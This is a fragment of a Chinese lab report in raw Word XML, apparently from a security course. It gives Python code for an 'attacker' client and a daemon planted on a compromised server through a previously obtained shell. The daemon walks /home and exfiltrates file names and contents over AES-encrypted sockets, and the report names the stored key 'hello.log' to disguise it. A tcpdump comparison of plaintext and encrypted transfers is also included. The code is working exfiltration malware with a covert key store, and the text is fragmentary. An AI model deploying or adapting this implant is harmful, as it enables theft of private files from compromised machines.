open('/home/erio/Desktop/attacker/attpublic.pem') as publickfile: #自动 close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'/home/erio/Desktop/serverf/daepublic.pem'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publickfile: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#自动 close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p = publickfile.read()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mypub=rsa.PublicKey.load_pkcs1(p)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'/home/erio/Desktop/serverf/daeprivate.pem'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privatefile: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#自动 close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p = privatefile.read()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mypri=rsa.PrivateKey.load_pkcs1(p)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'/home/erio/Desktop/serverf/attpublic.pem'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publickfile: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#自动 close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p = publickfile.read()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otherpub=rsa.PublicKey.load_pkcs1(p)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N2=random.randint(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1234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9999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N2=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(N2)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server = socket.socket()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server.bind((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"localhost"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23232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绑定监听端口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server.listen(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监听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conn, addr = server.accept()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等待连接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veri=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'IDAttacker'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veri=veri.encode(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'utf-8'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i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#step1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data = conn.recv(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接收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content = rsa.decrypt(data, mypri)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ID=content[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ID !=veri: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"ID fault"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#step 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N1=content[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msg=N1+N2.encode(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'utf-8'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crypto = rsa.encrypt(msg,otherpub)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conn.send(crypto)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传送和接收都是bytes类型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#sstep 3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data = conn.recv(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接收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content = rsa.decrypt(data, mypri)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N22=content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N22!=N2.encode(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'utf-8'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"N22!=N2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#print("step 3 succeed\n")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#step 4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data = conn.recv(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接收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data = rsa.decrypt(data, mypri)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key=data[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(key)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signn=data[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veri=rsa.verify(key,signn,otherpub)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#验证通过为true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veri==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'Verification failed'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(key)!=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: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#128 bit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"key length wrong"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(key)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server.close()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prifile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'hello.log'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'wb'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prifile.write(key)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prifile.close()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'/home/erio/Desktop/serverf/hello.log'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aesfile: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#自动 close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aeskey = aesfile.read()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#str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aeskey=aeskey[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Sendkey.py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链接getkey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步骤一发送N1密文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步骤二接收N1+N2密文，解密，验证N1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步骤三发送N2密文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步骤四发送AES key的签名+key 密文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这里每完成一步就打印一串提示信息，方便用户了解当前进度，或者出现问题时了解原因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socket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os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random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rsa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time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#with open('/home/erio/Desktop/attacker/attpublic.pem') as publickfile: #自动 close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'/home/erio/Desktop/attacker/attpublic.pem'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publickfile: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#自动 close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p = publickfile.read()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mypub=rsa.PublicKey.load_pkcs1(p)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'/home/erio/Desktop/attacker/attprivate.pem'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privatefile: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#自动 close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p = privatefile.read()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mypri=rsa.PrivateKey.load_pkcs1(p)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'/home/erio/Desktop/attacker/daepublic.pem'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publickfile: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#自动 close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p = publickfile.read()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otherpub=rsa.PublicKey.load_pkcs1(p)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N1=random.randint(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1234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9999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#确定长度的随机数，这样方便分开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N1=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(N1)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IDAttack=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'IDAttacker'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#ID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client = socket.socket()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生成socket连接对象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ip_port =(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"localhost"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43333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地址和端口号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client.connect(ip_port)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连接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"服务器已连接"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i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msg=N1+IDAttack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msg=msg.encode(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'utf-8'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crypto = rsa.encrypt(msg,otherpub)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#crypto bytes类型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client.send(crypto)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传送和接收都是bytes类型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"step 1 succeed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data = client.recv(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接收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content = rsa.decrypt(data, mypri)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#解密后还是bytes （bytes相当于str.encode(utf-8)）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N11=content[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N2=content[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N11!=N1.encode(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'utf-8'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"N11!=N1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"step 2 succeed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msg=N2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crypto = rsa.encrypt(msg,otherpub)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time.sleep(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client.send(crypto)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传送和接收都是bytes类型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"step 3 succeed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key=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"keyskeyskeyskeys"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#128 bit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'/home/erio/Desktop/attacker/key.txt'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aesfile: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#自动 close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key = aesfile.read()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(key))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#str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key=key[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#/R/N 之类的影响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msg=key.encode(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'utf-8'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mysign = rsa.sign(msg, mypri,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'SHA-1'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#签名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msg=msg+mysign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crypto = rsa.encrypt(msg,otherpub)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time.sleep(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client.send(crypto)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传送和接收都是bytes类型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"step 4 succeed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client.close()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二者都有错误检测，出现问题停止继续发送key。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之后修改daemon程序，读取AES  key，搜索函数不变，然后在发送文件名、文件大小、文件内容时先AES CBC加密，然后发送原文的MD5校验值，修改为cryptdaemon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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Cryptdaemon.py见source codes/server/cryptdaemon.py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下面只展示修改过的发送函数senddd，加密函数encrypt，以及add_to_16 将字符串补全为16*n的函数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另外daemon.py读取txt时使用rb，读取bytes类型，编码比较麻烦，这里改成r，直接读取str。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Crypto.Cipher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AES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binascii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b2a_hex, a2b_hex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socket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os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hashlib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time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chardet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add_to_16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(text.encode(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'utf-8'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%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add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(text.encode(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'utf-8'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%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add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text = text + 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 add)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text.encode(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'utf-8'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加密函数 输入str。返回bytes ascii编码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encrypt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key = key.encode(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'utf-8'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mode = AES.MODE_ECB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text = add_to_16(text)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cryptos = AES.new(key, mode)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cipher_text = cryptos.encrypt(text)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b2a_hex(cipher_text)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可能文件会被修改，所以即使数量不变也重新发送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senddd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'home/erio/Desktop/serverf/hello.log'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aesfile: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#自动 close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aeskey = aesfile.read()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aeskey=aeskey[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#print('aes EBC key:%s \n'%(aeskey))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发送文件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dir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'/home'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#这里认为home是根目录//可以根据需要自行调整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server = socket.socket()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server.bind((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"localhost"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43232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绑定监听端口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server.listen(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监听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#print("监听开始..")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   while True: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conn, addr = server.accept()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等待连接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#print("conn:", conn, "\naddr:", addr)  # conn连接实例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i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   while True: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data = conn.recv(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接收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data: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客户端已断开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#print("客户端断开连接")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tempfilename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results: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!=os.path.exists(os.path.join(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dir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,tempfilename )):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#如果在被搜索到而在被发送前就被删除了，打开文件会错误，所以跳过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continue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0. 发送文件名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filename=os.path.join(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dir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,tempfilename)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aesfilename=encrypt(filename,aeskey)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conn.send(aesfilename)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发送文件名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#print("filename:", filename)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conn.recv(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接收确认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1.先发送文件大小，让客户端准备接收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size = os.stat(filename).st_size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#获取文件大小,字节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size=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(size)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aessize=encrypt(size,aeskey)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conn.send(aessize)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发送数据长度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#print("发送的大小：", size)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conn.recv(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接收确认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2.发送文件内容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m = hashlib.md5()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f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(filename,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#rb 是bytes，处理起来很麻烦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line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f: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#line bytes,encodng是ascii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#aesline=str(line)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#print(line)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aesline=encrypt(line,aeskey)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#ascii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conn.send(aesline)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发送数据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line=line.encode(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'utf-8'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m.update(line)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time.sleep(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f.close()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3.发送md5值进行校验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md5 = m.hexdigest()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conn.send(md5.encode(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发送md5值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#print("md5:", md5)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conn.recv(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接收确认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time.sleep(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#否则接收方可能受到md5+下一个文件的内容/文件名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server.close()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相应的getfile在接收文件名、文件大小、文件内容时先AES 解密，修改为cryptgetfile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添加了解密函数decrypt，收到文件名、文件大小、文件内容先解密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这里由于一开始用的是rb，wb读取txt，bytes类型导致编码很复杂，改成了w,r直接读取字符串，处理起来很简单。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同时打印当前使用的AES EBC加密秘钥</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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Cryptgetfile.py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socket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os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hashlib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time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Crypto.Cipher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AES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binascii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b2a_hex, a2b_hex</w:t>
      </w:r>
    </w:p>
    <w:p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解密后，去掉补足的空格用strip() 去掉. 返回的是str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decrypt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key = key.encode(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'utf-8'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mode = AES.MODE_ECB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cryptor = AES.new(key, mode)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plain_text = cryptor.decrypt(a2b_hex(text))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.decode(plain_text).rstrip(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'/home/erio/Desktop/attacker/key.txt'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aesfile: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#自动 close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aeskey = aesfile.read()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aeskey=aeskey[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'aes EBC key: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%(aeskey))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"新一轮接收开始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client = socket.socket()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生成socket连接对象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ip_port =(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"localhost"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43232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地址和端口号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client.connect(ip_port)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连接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"服务器已连接"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msg=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'read to recv'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client.send(msg.encode(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传送和接收都是bytes类型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0. 接受文件名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server_response = client.recv(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       if not server_response:  # 可能跳过了一次文件发送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               continue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file_name = server_response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file_name=decrypt(file_name,aeskey)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"文件名："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file_name)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client.send(msg.encode(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#发送确认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1.先接收长度，建议8192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server_response = client.recv(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file_size=decrypt(server_response,aeskey)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file_size =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(file_size)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"接收到的字节大小："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file_size)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client.send(msg.encode(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#发送确认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2.接收文件内容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client.send(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"准备好接收"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接收确认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nowtime = time.strftime(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"%Y-%m-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-%H-%M-%S"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time.localtime())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filename = file_name[:-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+nowtime+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'.txt'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f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(filename,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wb是字节写入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received_size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m = hashlib.md5()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received_size &lt; file_size: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#每次读一行写入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data = client.recv(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多次接收内容，接收大数据; 发送方设置延迟0.1s，来防止粘包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data=decrypt(data,aeskey)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这里decrypt 得到的str 包含 b' xxxxx '。下面去掉b' '，得到形如 'whu\n' 的str。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#print(data)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#data=data[2:-1]   #去掉 b','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#print(data)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#print('\n')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dataenc=data.encode(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'utf-8'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#保持一致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#print(dataenc)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#print('\n')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data_len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(data)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#去掉最后的\r\n占的长度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received_size += data_len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"已接收："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(received_size/file_size*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m.update(dataenc)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f.write(data)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f.close()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"实际接收的大小:"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received_size)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解码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3.md5值校验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md5_sever = client.recv(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).decode(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md5_client = m.hexdigest()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client.send(msg.encode(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#发送确认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"服务器发来的md5:"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md5_sever)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"接收文件的md5:"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md5_client)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md5_sever == md5_client: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"MD5值校验成功"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"MD5值校验失败"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"当前轮接受结束，daemon进入下一次探测阶段;5S后可再次连接获取文件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Getkey，cryptdaemon在编译为程序后通过任务二获取的shell，上传到server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这里pyinstaller 编译cryptdaemon.py出现一些问题，直接使用cryptdaemon.py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运行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8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Getkey程序通过shell上传到server然后运行，等待attacker端sendkey，保存秘钥。保存为 hello.log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运行命令 ./getkey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87140" cy="57150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当上传getkey并在server运行后，在attacker端运行 ./sendkey，读取key.txt中的128位秘钥，发送到server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3962400" cy="147066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以上完成aes 秘钥的传输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8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Cryptdaemon程序上传到server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8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运行命令 sudo python3 cryptdaemon.py</w:t>
      </w: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79184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8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8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当server端运行cryptdaemon后，Attacker端运行 ./cryptgetfile  即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4648200" cy="25069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传输的文件对比，可见传输成功，没有错误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秘钥管理机制和传输加密方案分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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秘钥传输分析：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AES秘钥传输分析见任务四，比较安全，可以防止中间人攻击。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但是daemon 端RSA 私钥 直接使用wget下载。安全性依赖于wget，可能有风险。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Daemon和attacker的公钥也使用wget传输，但是即使暴露也没有问题，没有风险。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秘钥存储分析：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使用的RSA公私钥，daemon端只保存daemon的公钥私钥以及server的公钥，attacker端私钥只自己保存，没有风险。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使用的AES 秘钥在daemon端保存为 hello.log，用于迷惑。可以先用daemon的RSA秘钥加密再存储，每次daemon使用前先解密，更安全。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传输加密方案：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文件名，文件大小，文件内容都使用AES EBC加密，除非AES秘钥被破获，否则很安全。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并且对文件内容使用MD5哈希，接收端可以进一步验证传输内容的完整性。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抓包比较证明加密未加密区别：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由于linux下wireshark不能直接抓取127.0.0.1的包，采用tcpdump抓包，然后wireshark解析。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Daemon geifle 明文传输抓包：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sudo tcpdump -i lo src host localhost and dst host localhost and src port 23232 -v -c 6  -w  daemon.out</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3281045" cy="2105660"/>
            <wp:effectExtent l="0" t="0" r="1079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946785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1333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Wireshark打开  daemon.OUT.可见内容明文传输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099560" cy="3404235"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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Cryptdaemon cryptgetfile 密文传输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sudo tcpdump -i lo src host localhost and dst host localhost and src port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43232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 -v -c 6  -w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crypt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daemon.out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72405" cy="2657475"/>
            <wp:effectExtent l="0" t="0" r="635" b="952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763905"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1333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Wireshark打开 cryptdaemon.out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可见传输内容都已经加密。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129405" cy="3437890"/>
            <wp:effectExtent l="0" t="0" r="635" b="635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606FF"/>
    <w:rsid w:val="04065E23"/>
    <w:rsid w:val="05B70E98"/>
    <w:rsid w:val="094D3B0C"/>
    <w:rsid w:val="0CF41428"/>
    <w:rsid w:val="0DF017C8"/>
    <w:rsid w:val="15DC197C"/>
    <w:rsid w:val="168167F5"/>
    <w:rsid w:val="17F25893"/>
    <w:rsid w:val="18194AEB"/>
    <w:rsid w:val="181D4F9A"/>
    <w:rsid w:val="18803A6D"/>
    <w:rsid w:val="1DD058E1"/>
    <w:rsid w:val="213F08BF"/>
    <w:rsid w:val="22326352"/>
    <w:rsid w:val="23AE0D8D"/>
    <w:rsid w:val="23D96C2F"/>
    <w:rsid w:val="24312ACB"/>
    <w:rsid w:val="27A5060C"/>
    <w:rsid w:val="28C31EBB"/>
    <w:rsid w:val="2F4A3A79"/>
    <w:rsid w:val="34A25959"/>
    <w:rsid w:val="35681B8C"/>
    <w:rsid w:val="382C752A"/>
    <w:rsid w:val="3B4871E6"/>
    <w:rsid w:val="3B8069B8"/>
    <w:rsid w:val="42915CAD"/>
    <w:rsid w:val="43124F7A"/>
    <w:rsid w:val="44986FE5"/>
    <w:rsid w:val="451800AE"/>
    <w:rsid w:val="45BC67D6"/>
    <w:rsid w:val="4AAC6F21"/>
    <w:rsid w:val="4B2A5BF9"/>
    <w:rsid w:val="4C9D3826"/>
    <w:rsid w:val="4D2277FA"/>
    <w:rsid w:val="4E8F7DBF"/>
    <w:rsid w:val="51154D7C"/>
    <w:rsid w:val="51CE7D74"/>
    <w:rsid w:val="57774410"/>
    <w:rsid w:val="598A6CFB"/>
    <w:rsid w:val="5BB92068"/>
    <w:rsid w:val="5CFD3F7F"/>
    <w:rsid w:val="5D1F4708"/>
    <w:rsid w:val="5E1E24CA"/>
    <w:rsid w:val="5E29543D"/>
    <w:rsid w:val="5FB014AE"/>
    <w:rsid w:val="64E55FED"/>
    <w:rsid w:val="65AC60EA"/>
    <w:rsid w:val="693D323A"/>
    <w:rsid w:val="6CAB26A5"/>
    <w:rsid w:val="6DFB61A4"/>
    <w:rsid w:val="76354BF2"/>
    <w:rsid w:val="76885735"/>
    <w:rsid w:val="78094F01"/>
    <w:rsid w:val="7B9B1B3B"/>
    <w:rsid w:val="7C840EA4"/>
    <w:rsid w:val="7F9B3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人畜无害</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-29T02:11:14Z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